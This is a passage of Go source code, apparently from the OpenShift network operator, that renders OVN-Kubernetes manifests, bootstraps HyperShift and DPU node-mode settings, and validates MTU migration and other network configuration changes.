data.Data["K8S_APISERVER"] = "https://" + net.JoinHostPort(apiServer.Host, apiServer.Port)
data.Data["K8S_LOCAL_APISERVER"] = "https://" + net.JoinHostPort(localAPIServer.Host, localAPIServer.Port)
data.Data["HTTP_PROXY"] = bootstrapResult.Infra.Proxy.HTTPProxy
data.Data["HTTPS_PROXY"] = bootstrapResult.Infra.Proxy.HTTPSProxy
data.Data["NO_PROXY"] = bootstrapResult.Infra.Proxy.NoProxy
data.Data["TokenMinterImage"] = os.Getenv("TOKEN_MINTER_IMAGE")
// TOKEN_AUDIENCE is used by token-minter to identify the audience for the service account token which is verified by the apiserver
data.Data["TokenAudience"] = os.Getenv("TOKEN_AUDIENCE")
data.Data["MTU"] = c.MTU
data.Data["RoutableMTU"] = nil
if conf.Migration != nil && conf.Migration.MTU != nil {
if *conf.Migration.MTU.Network.From > *conf.Migration.MTU.Network.To {
data.Data["MTU"] = conf.Migration.MTU.Network.From
data.Data["RoutableMTU"] = conf.Migration.MTU.Network.To
} else {
data.Data["MTU"] = conf.Migration.MTU.Network.To
data.Data["RoutableMTU"] = conf.Migration.MTU.Network.From
}
// c.MTU is used to set the applied network configuration MTU
// MTU migration procedure:
// 1. User sets the MTU they want to migrate to
// 2. CNO sets the MTU as applied
// 3. User can then set the MTU as configured
c.MTU = conf.Migration.MTU.Network.To
}
data.Data["GenevePort"] = c.GenevePort
data.Data["CNIConfDir"] = pluginCNIConfDir(conf)
data.Data["CNIBinDir"] = CNIBinDir
data.Data["OVN_NODE_MODE"] = OVN_NODE_MODE_FULL
data.Data["OVN_NB_PORT"] = OVN_NB_PORT
data.Data["OVN_SB_PORT"] = OVN_SB_PORT
data.Data["OVN_NB_RAFT_PORT"] = OVN_NB_RAFT_PORT
data.Data["OVN_SB_RAFT_PORT"] = OVN_SB_RAFT_PORT
data.Data["OVN_NB_RAFT_ELECTION_TIMER"] = os.Getenv("OVN_NB_RAFT_ELECTION_TIMER")
data.Data["OVN_SB_RAFT_ELECTION_TIMER"] = os.Getenv("OVN_SB_RAFT_ELECTION_TIMER")
data.Data["OVN_CONTROLLER_INACTIVITY_PROBE"] = os.Getenv("OVN_CONTROLLER_INACTIVITY_PROBE")
controller_inactivity_probe := os.Getenv("OVN_CONTROLLER_INACTIVITY_PROBE")
if len(controller_inactivity_probe) == 0 {
controller_inactivity_probe = "180000"
klog.Infof("OVN_CONTROLLER_INACTIVITY_PROBE env var is not defined. Using: %s", controller_inactivity_probe)
}
data.Data["OVN_CONTROLLER_INACTIVITY_PROBE"] = controller_inactivity_probe
nb_inactivity_probe := os.Getenv("OVN_NB_INACTIVITY_PROBE")
if len(nb_inactivity_probe) == 0 {
nb_inactivity_probe = "60000"
klog.Infof("OVN_NB_INACTIVITY_PROBE env var is not defined. Using: %s", nb_inactivity_probe)
}
// Hypershift
data.Data["ManagementClusterName"] = client.ManagementClusterName
data.Data["HostedClusterNamespace"] = bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.Namespace
data.Data["OvnkubeMasterReplicas"] = len(bootstrapResult.OVN.MasterAddresses)
data.Data["ClusterID"] = bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.ClusterID
data.Data["ClusterIDLabel"] = ClusterIDLabel
data.Data["OVNDbServiceType"] = corev1.ServiceTypeClusterIP
data.Data["OVNSbDbRouteHost"] = nil
data.Data["OVN_SB_NODE_PORT"] = nil
data.Data["OVN_NB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%s", bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, OVN_SB_DB_ROUTE_PORT)
data.Data["OVN_SB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%s", bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, OVN_SB_DB_ROUTE_PORT)
pubStrategy := bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.ServicePublishingStrategy
if pubStrategy != nil && pubStrategy.Type == hyperv1.Route {
if pubStrategy.Route != nil && pubStrategy.Route.Hostname != "" {
data.Data["OVNSbDbRouteHost"] = pubStrategy.Route.Hostname
}
} else if pubStrategy != nil && pubStrategy.Type == hyperv1.NodePort {
data.Data["OVNDbServiceType"] = corev1.ServiceTypeNodePort
data.Data["OVN_SB_NODE_PORT"] = bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteNodePort
data.Data["OVN_NB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%d", bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteNodePort)
data.Data["OVN_SB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%d", bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteNodePort)
}
// Hypershift proxy
if bootstrapResult.Infra.Proxy.HTTPProxy == "" {
data.Data["ENABLE_OVN_NODE_PROXY"] = false
} else {
data.Data["ENABLE_OVN_NODE_PROXY"] = true
u, err := url.Parse(bootstrapResult.Infra.Proxy.HTTPProxy)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to parse http proxy")
}
host, port, err := net.SplitHostPort(u.Host)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to split http proxy host")
}
data.Data["HTTP_PROXY_IP"] = host
data.Data["HTTP_PROXY_PORT"] = port
data.Data["OVN_SB_DB_ROUTE_LOCAL_PORT"] = OVN_SB_DB_ROUTE_LOCAL_PORT
data.Data["OVN_NB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%s",
bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, OVN_SB_DB_ROUTE_LOCAL_PORT)
data.Data["OVN_SB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%s",
bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, OVN_SB_DB_ROUTE_LOCAL_PORT)
data.Data["OVN_SB_DB_ROUTE_HOST"] = bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost
var routePort string
if pubStrategy != nil && pubStrategy.Type == hyperv1.NodePort {
routePort = strconv.Itoa(int(bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteNodePort))
} else {
routePort = OVN_SB_DB_ROUTE_PORT
}
data.Data["OVN_SB_DB_ROUTE_PORT"] = routePort
}
data.Data["OVN_NB_INACTIVITY_PROBE"] = nb_inactivity_probe
data.Data["OVN_NB_DB_LIST"] = dbList(bootstrapResult.OVN.MasterAddresses, OVN_NB_PORT)
data.Data["OVN_SB_DB_LIST"] = dbList(bootstrapResult.OVN.MasterAddresses, OVN_SB_PORT)
data.Data["OVN_DB_CLUSTER_INITIATOR"] = bootstrapResult.OVN.ClusterInitiator
data.Data["OVN_MIN_AVAILABLE"] = len(bootstrapResult.OVN.MasterAddresses)/2 + 1
data.Data["LISTEN_DUAL_STACK"] = listenDualStack(bootstrapResult.OVN.MasterAddresses[0])
data.Data["OVN_CERT_CN"] = OVN_CERT_CN
data.Data["OVN_NORTHD_PROBE_INTERVAL"] = os.Getenv("OVN_NORTHD_PROBE_INTERVAL")
data.Data["NetFlowCollectors"] = ""
data.Data["SFlowCollectors"] = ""
data.Data["IPFIXCollectors"] = ""
data.Data["IPFIXCacheMaxFlows"] = ""
data.Data["IPFIXCacheActiveTimeout"] = ""
data.Data["IPFIXSampling"] = ""
data.Data["OVNPolicyAuditRateLimit"] = c.PolicyAuditConfig.RateLimit
data.Data["OVNPolicyAuditMaxFileSize"] = c.PolicyAuditConfig.MaxFileSize
data.Data["OVNPolicyAuditDestination"] = c.PolicyAuditConfig.Destination
data.Data["OVNPolicyAuditSyslogFacility"] = c.PolicyAuditConfig.SyslogFacility
data.Data["OVN_LOG_PATTERN_CONSOLE"] = OVN_LOG_PATTERN_CONSOLE
data.Data["PlatformType"] = bootstrapResult.Infra.PlatformType
if bootstrapResult.Infra.PlatformType == configv1.AzurePlatformType {
data.Data["OVNPlatformAzure"] = true
} else {
data.Data["OVNPlatformAzure"] = false
}
var ippools string
for _, net := range conf.ClusterNetwork {
if len(ippools) != 0 {
ippools += ","
}
ippools += fmt.Sprintf("%s/%d", net.CIDR, net.HostPrefix)
}
data.Data["OVN_cidr"] = ippools
data.Data["OVN_service_cidr"] = strings.Join(conf.ServiceNetwork, ",")
if c.HybridOverlayConfig != nil {
if len(c.HybridOverlayConfig.HybridClusterNetwork) > 0 {
data.Data["OVNHybridOverlayNetCIDR"] = c.HybridOverlayConfig.HybridClusterNetwork[0].CIDR
} else {
data.Data["OVNHybridOverlayNetCIDR"] = ""
}
if c.HybridOverlayConfig.HybridOverlayVXLANPort != nil {
data.Data["OVNHybridOverlayVXLANPort"] = c.HybridOverlayConfig.HybridOverlayVXLANPort
} else {
data.Data["OVNHybridOverlayVXLANPort"] = ""
}
data.Data["OVNHybridOverlayEnable"] = true
} else {
data.Data["OVNHybridOverlayNetCIDR"] = ""
data.Data["OVNHybridOverlayEnable"] = false
data.Data["OVNHybridOverlayVXLANPort"] = ""
}
// If IPsec is enabled for the first time, we start the daemonset. If it is
// disabled after that, we do not stop the daemonset but only stop IPsec.
//
// TODO: We need to do this as, by default, we maintain IPsec state on the
// node in order to maintain encrypted connectivity in the case of upgrades.
// If we only unrender the IPsec daemonset, we will be unable to cleanup
// the IPsec state on the node and the traffic will continue to be
// encrypted.
if c.IPsecConfig != nil {
// IPsec is enabled
data.Data["OVNIPsecDaemonsetEnable"] = true
data.Data["OVNIPsecEnable"] = true
} else {
if bootstrapResult.OVN.IPsecUpdateStatus != nil {
// IPsec has previously started and
// now it has been requested to be disabled
data.Data["OVNIPsecDaemonsetEnable"] = true
data.Data["OVNIPsecEnable"] = false
} else {
// IPsec has never started
data.Data["OVNIPsecDaemonsetEnable"] = false
data.Data["OVNIPsecEnable"] = false
}
}
if c.GatewayConfig != nil && c.GatewayConfig.RoutingViaHost {
data.Data["OVN_GATEWAY_MODE"] = OVN_LOCAL_GW_MODE
} else {
data.Data["OVN_GATEWAY_MODE"] = OVN_SHARED_GW_MODE
}
exportNetworkFlows := conf.ExportNetworkFlows
if exportNetworkFlows != nil {
if exportNetworkFlows.NetFlow != nil {
var collectors strings.Builder
for _, v := range exportNetworkFlows.NetFlow.Collectors {
collectors.WriteString(string(v) + ",")
}
data.Data["NetFlowCollectors"] = strings.TrimSuffix(collectors.String(), ",")
}
if exportNetworkFlows.SFlow != nil {
var collectors strings.Builder
for _, v := range exportNetworkFlows.SFlow.Collectors {
collectors.WriteString(string(v) + ",")
}
data.Data["SFlowCollectors"] = strings.TrimSuffix(collectors.String(), ",")
}
if exportNetworkFlows.IPFIX != nil {
var collectors strings.Builder
for _, v := range exportNetworkFlows.IPFIX.Collectors {
collectors.WriteString(string(v) + ",")
}
data.Data["IPFIXCollectors"] = strings.TrimSuffix(collectors.String(), ",")
}
}
renderOVNFlowsConfig(bootstrapResult, &data)
if len(bootstrapResult.OVN.MasterAddresses) == 1 {
data.Data["IsSNO"] = true
data.Data["NorthdThreads"] = 1
} else {
data.Data["IsSNO"] = false
// OVN 22.06 and later support multiple northd threads.
// Less resource constrained clusters can use multiple threads
// in northd to improve network operation latency at the cost
// of a bit of CPU.
data.Data["NorthdThreads"] = 4
}
var manifestSubDir string
manifestDirs := make([]string, 0, 2)
manifestDirs = append(manifestDirs, filepath.Join(manifestDir, "network/ovn-kubernetes/common"))
if bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.Enabled {
manifestSubDir = "network/ovn-kubernetes/managed"
manifestDirs = append(manifestDirs, filepath.Join(manifestDir, manifestSubDir))
} else {
manifestSubDir = "network/ovn-kubernetes/self-hosted"
manifestDirs = append(manifestDirs, filepath.Join(manifestDir, manifestSubDir))
}
manifests, err := render.RenderDirs(manifestDirs, &data)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to render manifests")
}
objs = append(objs, manifests...)
nodeMode := bootstrapResult.OVN.OVNKubernetesConfig.NodeMode
if nodeMode == OVN_NODE_MODE_DPU_HOST {
data.Data["OVN_NODE_MODE"] = nodeMode
manifests, err = render.RenderTemplate(filepath.Join(manifestDir, manifestSubDir+"/ovnkube-node.yaml"), &data)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to render manifests")
}
objs = append(objs, manifests...)
} else if nodeMode == OVN_NODE_MODE_DPU {
// "OVN_NODE_MODE" not set when render.RenderDir() called above,
// so render just the error-cni.yaml with "OVN_NODE_MODE" set.
data.Data["OVN_NODE_MODE"] = nodeMode
manifests, err = render.RenderTemplate(filepath.Join(manifestDir, "network/ovn-kubernetes/common/error-cni.yaml"), &data)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to render manifests")
}
objs = append(objs, manifests...)
// Run KubeProxy on DPU
// DPU_DEV_PREVIEW
// Node Mode is currently configured via a stand-alone configMap and stored
// in bootstrapResult. Once out of DevPreview, CNO API will be expanded to
// include Node Mode and it will be stored in conf (operv1.NetworkSpec) and
// defaultDeployKubeProxy() will have access and this can be removed.
if conf.DeployKubeProxy == nil {
v := true
conf.DeployKubeProxy = &v
} else {
*conf.DeployKubeProxy = true
}
fillKubeProxyDefaults(conf, nil)
}
// obtain the current IP family mode.
ipFamilyMode := names.IPFamilySingleStack
if len(conf.ServiceNetwork) == 2 {
ipFamilyMode = names.IPFamilyDualStack
}
// check if the IP family mode has changed and control the conversion process.
updateNode, updateMaster := shouldUpdateOVNKonIPFamilyChange(bootstrapResult.OVN, ipFamilyMode)
// annotate the daemonset and the daemonset template with the current IP family mode,
// this triggers a daemonset restart if there are changes.
err = setOVNObjectAnnotation(objs, names.NetworkIPFamilyModeAnnotation, ipFamilyMode)
if err != nil {
return nil, progressing, errors.Wrapf(err, "failed to set IP family %s annotation on daemonsets or statefulsets", ipFamilyMode)
}
// don't process upgrades if we are handling a dual-stack conversion.
if updateMaster && updateNode {
updateNode, updateMaster = shouldUpdateOVNKonUpgrade(bootstrapResult.OVN, os.Getenv("RELEASE_VERSION"))
}
renderPrePull := false
if updateNode {
updateNode, renderPrePull = shouldUpdateOVNKonPrepull(bootstrapResult.OVN, os.Getenv("RELEASE_VERSION"))
}
// If we need to delay master or node daemonset rollout, then we'll tag that daemonset with "create-only"
if !updateMaster {
kind := bootstrapResult.OVN.MasterUpdateStatus.Kind
namespace := bootstrapResult.OVN.MasterUpdateStatus.Namespace
name := bootstrapResult.OVN.MasterUpdateStatus.Name
k8s.UpdateObjByGroupKindName(objs, "apps", kind, namespace, name, func(o *uns.Unstructured) {
anno := o.GetAnnotations()
if anno == nil {
anno = map[string]string{}
}
anno[names.CreateOnlyAnnotation] = "true"
o.SetAnnotations(anno)
})
}
if !updateNode {
kind := bootstrapResult.OVN.NodeUpdateStatus.Kind
namespace := bootstrapResult.OVN.NodeUpdateStatus.Namespace
name := bootstrapResult.OVN.NodeUpdateStatus.Name
k8s.UpdateObjByGroupKindName(objs, "apps", kind, namespace, name, func(o *uns.Unstructured) {
anno := o.GetAnnotations()
if anno == nil {
anno = map[string]string{}
}
anno[names.CreateOnlyAnnotation] = "true"
o.SetAnnotations(anno)
})
}
if !renderPrePull {
// remove prepull from the list of objects to render.
objs = k8s.RemoveObjByGroupKindName(objs, "apps", "DaemonSet", "openshift-ovn-kubernetes", "ovnkube-upgrades-prepuller")
}
if bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.Enabled && bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost == "" {
k8s.UpdateObjByGroupKindName(objs, "apps", "DaemonSet", "openshift-ovn-kubernetes", "ovnkube-node", func(o *uns.Unstructured) {
anno := o.GetAnnotations()
if anno == nil {
anno = map[string]string{}
}
anno[names.CreateWaitAnnotation] = "true"
o.SetAnnotations(anno)
})
progressing = true
}
return objs, progressing, nil
}
// renderOVNFlowsConfig renders the bootstrapped information from the ovs-flows-config ConfigMap
func renderOVNFlowsConfig(bootstrapResult *bootstrap.BootstrapResult, data *render.RenderData) {
flows := bootstrapResult.OVN.FlowsConfig
if flows == nil {
return
}
if flows.Target == "" {
klog.Warningf("ovs-flows-config configmap 'target' field can't be empty. Ignoring configuration: %+v", flows)
return
}
// if IPFIX collectors are provided by means of both the operator configuration and the
// ovs-flows-config ConfigMap, we will merge both targets
if colls, ok := data.Data["IPFIXCollectors"].(string); !ok || colls == "" {
data.Data["IPFIXCollectors"] = flows.Target
} else {
data.Data["IPFIXCollectors"] = colls + "," + flows.Target
}
if flows.CacheMaxFlows != nil {
data.Data["IPFIXCacheMaxFlows"] = *flows.CacheMaxFlows
}
if flows.Sampling != nil {
data.Data["IPFIXSampling"] = *flows.Sampling
}
if flows.CacheActiveTimeout != nil {
data.Data["IPFIXCacheActiveTimeout"] = *flows.CacheActiveTimeout
}
}
func bootstrapOVNHyperShiftConfig(hc *HyperShiftConfig, kubeClient cnoclient.Client) (*bootstrap.OVNHyperShiftBootstrapResult, error) {
ovnHypershiftResult := &bootstrap.OVNHyperShiftBootstrapResult{
Enabled: hc.Enabled,
Namespace: hc.Namespace,
}
if !hc.Enabled {
return ovnHypershiftResult, nil
}
hcp := &hyperv1.HostedControlPlane{ObjectMeta: metav1.ObjectMeta{Name: hc.Name}}
err := kubeClient.ClientFor(cnoclient.ManagementClusterName).CRClient().Get(context.TODO(), types.NamespacedName{Namespace: hc.Namespace, Name: hc.Name}, hcp)
if err != nil {
if apierrors.IsNotFound(err) {
klog.Infof("Did not find hosted control plane")
} else {
return nil, fmt.Errorf("Could not get hosted control plane: %v", err)
}
}
ovnHypershiftResult.ClusterID = hcp.Spec.ClusterID
switch hcp.Spec.ControllerAvailabilityPolicy {
case hyperv1.HighlyAvailable:
ovnHypershiftResult.ControlPlaneReplicas = 3
default:
ovnHypershiftResult.ControlPlaneReplicas = 1
}
for _, svc := range hcp.Spec.Services {
// TODO: instead of the hardcoded string use ServiceType hyperv1.OVNSbDb once the API is updated
if svc.Service == "OVNSbDb" {
s := svc.ServicePublishingStrategy
ovnHypershiftResult.ServicePublishingStrategy = &s
}
}
if ovnHypershiftResult.ServicePublishingStrategy == nil {
klog.Warningf("service publishing strategy for OVN southbound database does not exist in hyperv1.HostedControlPlane %s/%s. Defaulting to route", hc.Name, hc.Namespace)
ovnHypershiftResult.ServicePublishingStrategy = &hyperv1.ServicePublishingStrategy{
Type: hyperv1.Route,
}
}
switch ovnHypershiftResult.ServicePublishingStrategy.Type {
case hyperv1.Route:
{
route := &routev1.Route{}
gvr := schema.GroupVersionResource{
Group: "route.openshift.io",
Version: "v1",
Resource: "routes",
}
clusterClient := kubeClient.ClientFor(client.ManagementClusterName)
routeObj, err := clusterClient.Dynamic().Resource(gvr).Namespace(hc.Namespace).Get(context.TODO(), "ovnkube-sbdb", metav1.GetOptions{})
if err != nil {
if apierrors.IsNotFound(err) {
klog.Infof("Did not find ovnkube-sbdb route")
} else {
return nil, fmt.Errorf("could not get ovnkube-sbdb route: %v", err)
}
} else {
err := runtime.DefaultUnstructuredConverter.FromUnstructured(routeObj.UnstructuredContent(), route)
if err != nil {
return nil, err
}
if (len(route.Status.Ingress) < 1 || route.Status.Ingress[0].Host == "") && route.Spec.Host == "" {
return ovnHypershiftResult, nil
}
if len(route.Status.Ingress) >= 1 && route.Status.Ingress[0].Host != "" {
ovnHypershiftResult.OVNSbDbRouteHost = route.Status.Ingress[0].Host
} else if route.Spec.Host != "" {
ovnHypershiftResult.OVNSbDbRouteHost = route.Spec.Host
}
klog.Infof("Overriding OVN configuration route to %s", ovnHypershiftResult.OVNSbDbRouteHost)
}
}
case hyperv1.NodePort:
{
svc := &corev1.Service{}
clusterClient := kubeClient.ClientFor(client.ManagementClusterName)
err = clusterClient.CRClient().Get(context.TODO(), types.NamespacedName{Namespace: hc.Namespace, Name: "ovnkube-master-external"}, svc)
if err != nil {
if apierrors.IsNotFound(err) {
klog.Infof("Did not find ovnkube-master service")
return ovnHypershiftResult, nil
} else {
return nil, fmt.Errorf("could not get ovnkube-master service: %v", err)
}
}
var sbDbPort int32
for _, p := range svc.Spec.Ports {
if p.Name == "south" {
sbDbPort = p.NodePort
}
}
if sbDbPort > 0 {
ovnHypershiftResult.OVNSbDbRouteHost = ovnHypershiftResult.ServicePublishingStrategy.NodePort.Address
ovnHypershiftResult.OVNSbDbRouteNodePort = sbDbPort
} else {
klog.Infof("Node port not defined for ovnkube-master service")
}
}
default:
return nil, fmt.Errorf("unsupported service publishing strategy type: %s", ovnHypershiftResult.ServicePublishingStrategy.Type)
}
return ovnHypershiftResult, nil
}
// bootstrapOVNConfig returns the value of mode found in the openshift-ovn-kubernetes/dpu-mode-config configMap
// if it exists, otherwise returns default configuration for OCP clusters using OVN-Kubernetes
func bootstrapOVNConfig(conf *operv1.Network, kubeClient cnoclient.Client, hc *HyperShiftConfig) (*bootstrap.OVNConfigBoostrapResult, error) {
ovnConfigResult := &bootstrap.OVNConfigBoostrapResult{
NodeMode: OVN_NODE_MODE_FULL,
}
if conf.Spec.DefaultNetwork.OVNKubernetesConfig.GatewayConfig == nil {
bootstrapOVNGatewayConfig(conf, kubeClient.ClientFor("").CRClient())
}
var err error
ovnConfigResult.HyperShiftConfig, err = bootstrapOVNHyperShiftConfig(hc, kubeClient)
if err != nil {
return ovnConfigResult, err
}
cm := &corev1.ConfigMap{}
dmc := types.NamespacedName{Namespace: "openshift-network-operator", Name: "dpu-mode-config"}
err = kubeClient.ClientFor("").CRClient().Get(context.TODO(), dmc, cm)
if err != nil {
if apierrors.IsNotFound(err) {
klog.Infof("Did not find dpu-mode-config")
} else {
return nil, fmt.Errorf("Could not determine Node Mode: %w", err)
}
} else {
nodeModeOverride := cm.Data["mode"]
if nodeModeOverride != OVN_NODE_MODE_DPU_HOST && nodeModeOverride != OVN_NODE_MODE_DPU {
klog.Warningf("dpu-mode-config does not match %q or %q, is: %q. Using OVN configuration: %+v",
OVN_NODE_MODE_DPU_HOST, OVN_NODE_MODE_DPU, nodeModeOverride, ovnConfigResult)
return ovnConfigResult, nil
}
ovnConfigResult.NodeMode = nodeModeOverride
klog.Infof("Overriding OVN configuration to %+v", ovnConfigResult)
}
return ovnConfigResult, nil
}
// validateOVNKubernetes checks that the ovn-kubernetes specific configuration
// is basically sane.
func validateOVNKubernetes(conf *operv1.NetworkSpec) []error {
out := []error{}
var cnHasIPv4, cnHasIPv6 bool
for _, cn := range conf.ClusterNetwork {
if utilnet.IsIPv6CIDRString(cn.CIDR) {
cnHasIPv6 = true
} else {
cnHasIPv4 = true
}
}
if !cnHasIPv6 && !cnHasIPv4 {
out = append(out, errors.Errorf("ClusterNetwork cannot be empty"))
}
var snHasIPv4, snHasIPv6 bool
for _, sn := range conf.ServiceNetwork {
if utilnet.IsIPv6CIDRString(sn) {
snHasIPv6 = true
} else {
snHasIPv4 = true
}
}
if !snHasIPv6 && !snHasIPv4 {
out = append(out, errors.Errorf("ServiceNetwork cannot be empty"))
}
if cnHasIPv4 != snHasIPv4 || cnHasIPv6 != snHasIPv6 {
out = append(out, errors.Errorf("ClusterNetwork and ServiceNetwork must have matching IP families"))
}
if len(conf.ServiceNetwork) > 2 || (len(conf.ServiceNetwork) == 2 && (!snHasIPv4 || !snHasIPv6)) {
out = append(out, errors.Errorf("ServiceNetwork must have either a single CIDR or a dual-stack pair of CIDRs"))
}
oc := conf.DefaultNetwork.OVNKubernetesConfig
if oc != nil {
minMTU := MinMTUIPv4
if cnHasIPv6 {
minMTU = MinMTUIPv6
}
if oc.MTU != nil && (*oc.MTU < minMTU || *oc.MTU > MaxMTU) {
out = append(out, errors.Errorf("invalid MTU %d", *oc.MTU))
}
if oc.GenevePort != nil && (*oc.GenevePort < 1 || *oc.GenevePort > 65535) {
out = append(out, errors.Errorf("invalid GenevePort %d", *oc.GenevePort))
}
}
return out
}
func getOVNEncapOverhead(conf *operv1.NetworkSpec) uint32 {
const geneveOverhead = 100
const ipsecOverhead = 46 // Transport mode, AES-GCM
var encapOverhead uint32 = geneveOverhead
if conf.DefaultNetwork.OVNKubernetesConfig.IPsecConfig != nil {
encapOverhead += ipsecOverhead
}
return encapOverhead
}
// isOVNKubernetesChangeSafe currently returns an error if any changes to immutable
// fields are made.
// In the future, we may support rolling out MTU or other alterations.
func isOVNKubernetesChangeSafe(prev, next *operv1.NetworkSpec) []error {
pn := prev.DefaultNetwork.OVNKubernetesConfig
nn := next.DefaultNetwork.OVNKubernetesConfig
errs := []error{}
if next.Migration != nil && next.Migration.MTU != nil {
mtuNet := next.Migration.MTU.Network
mtuMach := next.Migration.MTU.Machine
// For MTU values provided for migration, verify that:
// - The current and target MTUs for the CNI are provided
// - The machine target MTU is provided
// - The current MTU actually matches the MTU known as current
// - The machine target MTU has a valid overhead with the CNI target MTU
if mtuNet == nil || mtuMach == nil || mtuNet.From == nil || mtuNet.To == nil || mtuMach.To == nil {
errs = append(errs, errors.Errorf("invalid Migration.MTU, at least one of the required fields is missing"))
} else {
// Only check next.Migration.MTU.Network.From when it changes
checkPrevMTU := prev.Migration == nil || prev.Migration.MTU == nil || prev.Migration.MTU.Network == nil || !reflect.DeepEqual(prev.Migration.MTU.Network.From, next.Migration.MTU.Network.From)
if checkPrevMTU && !reflect.DeepEqual(next.Migration.MTU.Network.From, pn.MTU) {
errs = append(errs, errors.Errorf("invalid Migration.MTU.Network.From(%d) not equal to the currently applied MTU(%d)", *next.Migration.MTU.Network.From, *pn.MTU))
}
minMTU := MinMTUIPv4
for _, cn := range next.ClusterNetwork {
if utilnet.IsIPv6CIDRString(cn.CIDR) {
minMTU = MinMTUIPv6
break
}
}
if *next.Migration.MTU.Network.To < minMTU || *next.Migration.MTU.Network.To > MaxMTU {
errs = append(errs, errors.Errorf("invalid Migration.MTU.Network.To(%d), has to be in range: %d-%d", *next.Migration.MTU.Network.To, minMTU, MaxMTU))
}
if *next.Migration.MTU.Machine.To < minMTU || *next.Migration.MTU.Machine.To > MaxMTU {
errs = append(errs, errors.Errorf("invalid Migration.MTU.Machine.To(%d), has to be in range: %d-%d", *next.Migration.MTU.Machine.To, minMTU, MaxMTU))
}
if (*next.Migration.MTU.Network.To + getOVNEncapOverhead(next)) > *next.Migration.MTU.Machine.To {
errs = append(errs, errors.Errorf("invalid Migration.MTU.Machine.To(%d), has to be at least %d", *next.Migration.MTU.Machine.To, *next.Migration.MTU.Network.To+getOVNEncapOverhead(next)))
}
}
} else if !reflect.DeepEqual(pn.MTU, nn.MTU) {
errs = append(errs, errors.Errorf("cannot change ovn-kubernetes MTU without migration"))
}
if !reflect.DeepEqual(pn.GenevePort, nn.GenevePort) {
errs = append(errs, errors.Errorf("cannot change ovn-kubernetes genevePort"))
}
if pn.HybridOverlayConfig == nil && nn.HybridOverlayConfig != nil {
errs = append(errs, errors.Errorf("cannot start a hybrid overlay network after install time"))
}
if pn.HybridOverlayConfig != nil {
if !reflect.DeepEqual(pn.HybridOverlayConfig, nn.HybridOverlayConfig) {
errs = append(errs, errors.Errorf("cannot edit a running hybrid overlay network"))
}
}
if pn.IPsecConfig != nil && nn.IPsecConfig != nil {
if !reflect.DeepEqual(pn.IPsecConfig, nn.IPsecConfig) {
errs = append(errs, errors.Errorf("cannot edit IPsec configuration at runtime"))
}
}
return errs
}
func fillOVNKubernetesDefaults(conf, previous *operv1.NetworkSpec, hostMTU int) {
if conf.DefaultNetwork.OVNKubernetesConfig == nil {
conf.DefaultNetwork.OVNKubernetesConfig = &operv1.OVNKubernetesConfig{}
}
sc := conf.DefaultNetwork.OVNKubernetesConfig
// MTU is currently the only field we pull from previous.
// If it's not supplied, we infer it by probing a node's interface via the mtu-prober job.
// However, this can never change, so we always prefer previous.
if sc.MTU == nil {
var mtu uint32
if previous != nil && previous.DefaultNetwork.OVNKubernetesConfig != nil &&
previous.DefaultNetwork.OVNKubernetesConfig.MTU != nil {
mtu = *previous.DefaultNetwork.OVNKubernetesConfig.MTU
} else {
// utter paranoia
// somehow we didn't probe the MTU in the controller, but we need it.
// This might be wrong in cases where the CNO is not local (e.g. Hypershift).
if hostMTU == 0 {
log.Printf("BUG: Probed MTU wasn't supplied, but was needed. Falling back to host MTU")
hostMTU, _ = GetDefaultMTU()
if hostMTU == 0 { // this is beyond unlikely.
panic("BUG: Probed MTU wasn't supplied, host MTU invalid")
}
}
mtu = uint32(hostMTU) - getOVNEncapOverhead(conf)
}
sc.MTU = &mtu
}
if sc.GenevePort == nil {
var geneve uint32 = uint32(6081)
sc.GenevePort = &geneve
}
if sc.PolicyAuditConfig == nil {
sc.PolicyAuditConfig = &operv1.PolicyAuditConfig{}
}
if sc.PolicyAuditConfig.RateLimit == nil {
var ratelimit uint32 = uint32(20)
sc.PolicyAuditConfig.RateLimit = &ratelimit
}
if sc.PolicyAuditConfig.MaxFileSize == nil {
var maxfilesize uint32 = uint32(50)
sc.PolicyAuditConfig.MaxFileSize = &maxfilesize
}
if sc.PolicyAuditConfig.Destination == "" {
var destination string = "null"
sc.PolicyAuditConfig.Destination = destination
}
if sc.PolicyAuditConfig.SyslogFacility == "" {
var syslogfacility string = "local0"
sc.PolicyAuditConfig.SyslogFacility = syslogfacility
}
}
type replicaCountDecoder struct {
ControlPlane struct {
Replicas string `json:"replicas"`
} `json:"controlPlane"`
}
// bootstrapOVNGatewayConfig sets the Network.operator.openshift.io.Spec.DefaultNetwork.OVNKubernetesConfig.GatewayConfig value
// based on the values from the "gateway-mode-config" map if any
func bootstrapOVNGatewayConfig(conf *operv1.Network, kubeClient crclient.Client) {
